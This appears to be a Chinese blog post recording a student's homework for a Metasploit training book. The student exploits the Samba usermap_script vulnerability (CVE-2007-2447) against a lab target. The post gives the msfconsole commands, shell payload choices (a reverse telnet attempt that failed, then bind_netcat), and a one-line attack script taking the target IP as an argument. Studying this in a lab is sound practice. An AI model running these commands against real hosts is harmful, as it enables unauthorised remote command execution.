metasploit魔鬼训练营第一章实践作业

最新推荐文章于 2024-05-11 08:25:33 发布
最新推荐文章于 2024-05-11 08:25:33 发布
阅读量2.3k 收藏 5
点赞数
分类专栏: 魔鬼训练营1 文章标签: 渗透测试 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lilywang20119/article/details/71158132
版权

1.搜索Samba服务usermap_script安全漏洞相关信息



根据下面的连接,搜索到如下内容:

The time line is as follows:

* May 7, 2007: Initial defect disclosure to the security@samba.org
  email alias.
* May 7, 2007: Initial developer response by Samba
  developer Gerald Carter.
* May 9, 2007: Patch released by Samba developer Jeremy
  Allison to iDefense for testing.
* May 10, Announcement to vendor-sec mailing list
* May 14, 2007: Public announcement of the security issue.

该漏洞的生命周期图,不会,略过

2.msfconsole 更新apt-get update

metasploit攻击模块路径:

dpkg -S metasploit
kali:/usr/share/metasploit-framework/modules/exploits
BT5:/opt/framework3/msf3/modules/exploits
linuxshell 统计针对windows2000 windowsxp。。。。目标环境的攻击模块数量(不知道)
 

 

3.运行metasploit完成对Linux靶机usermap_script攻击
 

kali: msfconsole
 

msf>show exploits
 

msf>use exploit/multi/samba/usermap_script 
 

 

msf> use exploit/multi/samba/usermap_script
msf> show options
msf> set RHOST 192.168.213.133
msf> exploit


 尝试使用VNC图形化远程控制工具的攻击载荷 

 

我的做法:
 

msf exploit(usermap_script) > show payloads
 

msf exploit(usermap_script) > set PAYLOADS cmd/unix/reverse_ssl_double_telnet 
 
 

msf exploit(usermap_script) > exploits
 
 

攻击失败了,但是流程应该是这样的????求解答
 

4.msfcli -h
 

msfconsole
 

msf>show payloads
 

msf>vim 1.attack.sh
 

 

 msfcli multi/samba/usermap_script PAYLOAD=/cmd/unix/bind_netcat   RHOST=$1 E 
 

msf>sh 1.attack.sh 192.168.213.133
 

 

 


 

                

        

        

    




    

      

        

            

              
                
                  lilywang20119
                
              
            

            

                关注
              
            

        

        

          
    
            
  • 
              
                
                
                
                
                      0
                
              
              
    点赞
    
            
    • 
            
  • 
              
                
                
                
              
              
    
            
    • 
            
  • 
              
                
                
                
                
                    5
                
              
              
    
                
    
                  
                    收藏
                  
                
    
              
    
              
    
                
    
                  觉得还不错?
                  
                    一键收藏
                  
                 
                
    
              
    
            
    • 
          
  • 
            
    
              
              
            
    
              
              
              
                    0
              
            
            
    评论
    
          
    • 
          
  • 
          
    • 
          
  • 
            
              
            
              
    
            
              
                
            
    
          
    • 
        

      

      

            

                专栏目录
          










                



	

		

			

				
					
Samba的usermap_script(CVE-2007-2447)漏洞整理

				
			

			

				

					野原新之助
				

				

					12-14
					
					1765
					
				

			

		

		

			
				
Username map script 是 Samba 协议的一个漏洞CVE-2007-2447,用户名映射脚本命令执行

			
		

	



                

              
                



	

		

			

				
					
MSF(Metasploit)之usermap_script漏洞的利用

				
			

			

				

					野原新之助
				

				

					12-15
					
					1097
					
				

			

		

		

			
				
Samba扩展
Samba开放端口如下:

tcp:139、445端口
udp:137、138端口

端口及服务详细信息博文链接:

Samba的usermap_script(CVE-2007-2447)漏洞整理

MSF渗透攻击

...

			
		

	



                


  
              

                


	

		

			

				
					
Metasploit魔鬼训练营第一章实践作业

				
			

			

				

					qq_39596232的博客
				

				

					03-31
					
					447
					
				

			

		

		

			
				
1、搜集Samba服务usermap_script安全漏洞的相关信息:

下面是Back Track 5上面提供的相关信息:



同时也可以参考下面的网站:




我在必应上找到的感觉介绍还不错的网站,也可以参考下:
https://www.rapid7.com/db/modules/exploit/multi/samba/usermap_script


2、该安全漏洞的生命周期图:
暂时不...

			
		

	





	

		

			

				
					
最全《MetaSploit渗透测试魔鬼训练营》之环境搭建(1),2024年最新2024软件测试春招

					
最新发布

				
			

			

				

					2401_84765537的博客
				

				

					05-11
					
					992
					
				

			

		

		

			
				
*注意:**DHCP设置中结束IP地址最后为255,否则后序端口扫描,254的那台会失败。其中,BT5太老了,都使用kali了,于是我换成了kali,接下来进行具体虚拟机的配置。(img-LbP1Zik3-1715387110838)]来重启网络,浏览器输入ip后可查看dvssc门户网站,说明此靶机配置成功。如果是自己,就写127.0.0.1即可,后面的靶机不再赘述。选择.vmx,使用VMware打开,选择我已复制该虚拟机。作为内外网网关,有两个网卡,都需要设置好。打开cmd命令窗口,输入命令。

			
		

	



		

			
		



	

		

			

				
					
Metasploit渗透测试魔鬼训练营》学习笔记

					
热门推荐

				
			

			

				

					weixin_40133285的博客
				

				

					05-16
					
					4万+
					
				

			

		

		

			
				
Metasploit渗透测试魔鬼训练营 诸葛建伟 陈力波 孙松柏 王衍 田繁 学习笔记
|Linux Metasploitable  | Linux靶机 |    下载vmware虚拟机镜像 
|WinXP Metasploitable  | Windows靶机 |    下载vmware虚拟机镜像  
|OWASP BWA  |  Web服务器靶机|    下载vmware虚拟机镜像 
|Win2K3 Metasploitable  |Windows靶机  |      下载vmware虚拟机镜像

			
		

	





	

		

			

				
					
metasploit渗透测试魔鬼训练营》学习笔记第六章--客户端渗透

				
			

			

				

					2301_77162959的博客
				

				

					05-29
					
					1094
					
				

			

		

		

			
				
攻击者在溢出程序后,并不执行栈中的shellcode,而是寻找程序已加载模块中的一些特殊指令块,配合栈上的压栈参数,返回地址等数据,将这些孤立的指令块联系起来,从而实现一定的功能,最终完成远程代码执行的目标。metasploit框架中包含一些针对浏览器及插件的模块,并且还提供了辅助模块 server/browser——autopwn,它在接到来自浏览器的请求后,会依次做三个操作:提取浏览器指纹,自动化渗透,列出渗透模块,但是他不会列出第三方插件的利用模块,因为它无法提取到插件的指纹。4.2.1浏览器渗透。

			
		

	





	

		

			

				
					
metasploit魔鬼训练营第一章笔记

				
			

			

				

					电风
				

				

					05-17
					
					4058
					
				

			

		

		

			
				
利用metasploit攻击靶机 
kali自带metasploit 
LINUX下启动方式 
1.msfconsole 
2.cd /usr/share/metasploit-framework/ 
./msfconsole 
(自带更新程序) 
 
一.控制台形式 
(1)msfconsole进入控制台终端 
 
(2)msf>help search,MSF终端会显示该命令的参数列表,包括每个参

			
		

	





	

		

			

				
					
Metasploit渗透测试魔鬼训练营 读书笔记

				
			

			

				

					09-18
				

			

		

		

			
				
渗透测试-web渗透6.pdf  渗透测试-内网客户端渗透9.pdf  渗透测试-内网网络服务端渗透7.pdf  渗透测试-后渗透阶段10.pdf  渗透测试-实验拓扑环境4.pdf  渗透测试-情报搜集5.pdf  渗透测试-社会工程学8.pdf ...

			
		

	





	

		

			

				
					
Metasploit_测试魔鬼训练营.zip

				
			

			

				

					09-27
				

			

		

		

			
				
首本中文原创Metasploit渗透测试著作,国内信息安全领域布道者和资深Metasploit渗透测试...很多知识点都配有案例解析,更重要的是每章还有精心设计的“魔鬼训练营实践作业”,充分体现了“实践实践,再实践”的宗旨。

			
		

	





	

		

			

				
					
Metasploit渗透测试魔鬼训练营

				
			

			

				

					cyynid的博客
				

				

					01-17
					
					752
					
				

			

		

		

			
				
7)利益性:利益永远是各种攻击的驱动力,Web攻击也不例外。近期相关司法部门公布有组织性的Web应用攻击,谋取利益的犯罪团伙案件越来越多,无论直接攻击Web 应用服务器,还是攻击欺骗客户终端的钓鱼攻击,抑或是通过可怕的分布式拒绝服务攻击(DDoS)进行敲诈,通过Web犯罪可以说是利润丰厚。6)变化性:Web应用的调整对于一个业务经常变化的公司来说,可以算是家常便饭,但是对于调整Web应用的开发人员、系统管理员等,他们往往缺乏充分的安全培训,却有着对复杂网络应用修改的特权,这样很难保证安全策略很好的实施。

			
		

	





	

		

			

				
					
metasploit渗透测试魔鬼训练营》学习笔记第三章----情报搜集

				
			

			

				

					2301_77162959的博客
				

				

					05-28
					
					500
					
				

			

		

		

			
				
Kali渗透测试系统集成了metasploit开源的漏洞测试框架,是渗透测试必备的神器。下面是我在学习metasploit的笔记,有什么错误的地方请指出来,我会立即纠正的~

			
		

	





	

		

			

				
					
Metasploit渗透测试魔鬼训练营》之环境搭建

				
			

			

				

					Miguel自学空间
				

				

					12-13
					
					1158
					
				

			

		

		

			
				
熟练掌握渗透测试的实验环境搭建内容,可以让我们更好的理解后续的渗透测试操作的目的与原理。本文记录了书中描述的实验环境的搭建过程的关键细节,包括环境拓扑资源下载硬件配置网络配置等,方便后续查阅。通过以上步骤完成对所有主机的配置后,可以通过ping命令测试这些主机相互之间的网络是否连通,从而验证配置是否正确。另外,也能通过ping命令测试这些主机与真实外网的连通性。通过配置实验环境,我们能更加熟悉整个网络拓扑结构,在进行渗透测试的时候,就能更清楚自己在进行的工作所针对的是哪个目标。

			
		

	





	

		

			

				
					
Metasploit学习: Samba服务 usermap_script安全漏洞利用

				
			

			

				

					Sy0ung_的博客
				

				

					11-18
					
					1694
					
				

			

		

		

			
				
Metasploit学习: Samba服务 usermap_script安全漏洞利用
1、username_script 是什么
- Samba协议的一个漏洞CVE-2007-2447,用户名映射脚本命令执行
- 影响Samba的3.0.20到3.0.25rc3 版本
- 当使用非默认的用户名映射脚本配置选项时产生
- 通过指定一个包含shell元字符的用户名,攻击者能够执行任意命令

2、如何利用
1、使用metasploit框架

3、漏洞时间线
漏洞的时间线: 
- 2007年5月7日:漏洞匿名披露到

			
		

	





	

		

			

				
					
MetaSploit渗透测试魔鬼训练营》之环境搭建

				
			

			

				

					关注网络安全、云原生安全
				

				

					01-04
					
					1万+
					
				

			

		

		

			
				
目录

渗透测试流程概述

顺序

渗透标准

渗透阶段

前期交互阶段

情报搜集阶段

威胁建模阶段

漏洞分析阶段

渗透攻击阶段

后渗透分析阶段

报告阶段

环境搭建

网络环境

虚拟机镜像

BT5

owasp bwa靶机

Win2K3 metasploitable

Ubuntu Metasploitable

WinxpSP3 metasploitable

情报搜集阶段

通过DNS和IP挖掘(踩点)

whois域名注册信息查询

ip定位查询

Google Hackin...

			
		

	





	

		

			

				
					
1.8 魔鬼训练营实践作业

				
			

			

				

					IS_18_BunNy的博客
				

				

					08-12
					
					191
					
				

			

		

		

			
				
1)通过搜索引擎、安全漏洞信息库等各种渠道,搜集Samba服务usermap_script安全漏洞的相关信息,画出该安全漏洞的生命周期图,标注各个重要事件点的日期,并提供详细描述和链接。


	- Samba协议的一个漏洞CVE-2007-2447,用户名映射脚本命令执行
	
	
	- 影响Samba的3.0.20到3.0.25rc3 版本
	
	
	- 当使用非默认的用户名映射脚本配置选项时产生
	
	
	- 通过指定一个包含shell元字符的用户名,攻击者能够执行任意命令
	
	
	- 漏洞生命周期
	

			
		

	





	

		

			

				
					
Metasploit魔鬼训练营学习笔记 (1)第三章

				
			

			

				

					ClintSeven的博客
				

				

					04-05
					
					4889
					
				

			

		

		

			
				
metasploit 学习笔记第三章 

			
		

	





	

		

			

				
					
Metasploit usermap_script漏洞相关笔记

				
			

			

				

					isinstance的博客
				

				

					12-06
					
					4666
					
				

			

		

		

			
				
usermap_script:CVE-2007-2447Samba用户名映射脚本命令执行这个模块利用漏洞执行命令,在Samba版本3.0.20到3.0.25rc3当使用非默认用户名映射脚本配置选项。 
通过指定一个用户名包含shell元字符,攻击者可以执行任意命令。 
不需要身份验证来利用此漏洞,因为此选项用于在身份验证之前映射用户名!模块的位置 
exploit/multi/samba/userm

			
		

	





	

		

			

				
					
metsploit魔鬼训练营第一章作业

				
			

			

				

					sky
				

				

					06-04
					
					1337
					
				

			

		

		

			
				
实验一:通过攻击samba服务漏洞控制linux靶机
目标ip:192.168.232.134
metasploitable靶机下载地址:链接:http://pan.百度.com/s/1slHJcZV 密码:ndoj
实验环境:kali linux
kali:msfconsole 
msf > use exploit/multi/samba/usermap_script 

msf

			
		

	





	

		

			

				
					
metasploit渗透测试魔鬼训练营

				
			

			

				

					09-03
				

			

		

		

			
				
Metasploit渗透测试魔鬼训练营是一个专门针对Metasploit工具进行训练和实践的培训班。  这个训练营的目的是让参与者全面了解Metasploit的功能和使用方法,并通过实际操作和挑战来提高他们的渗透测试技能。在训练中,...

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值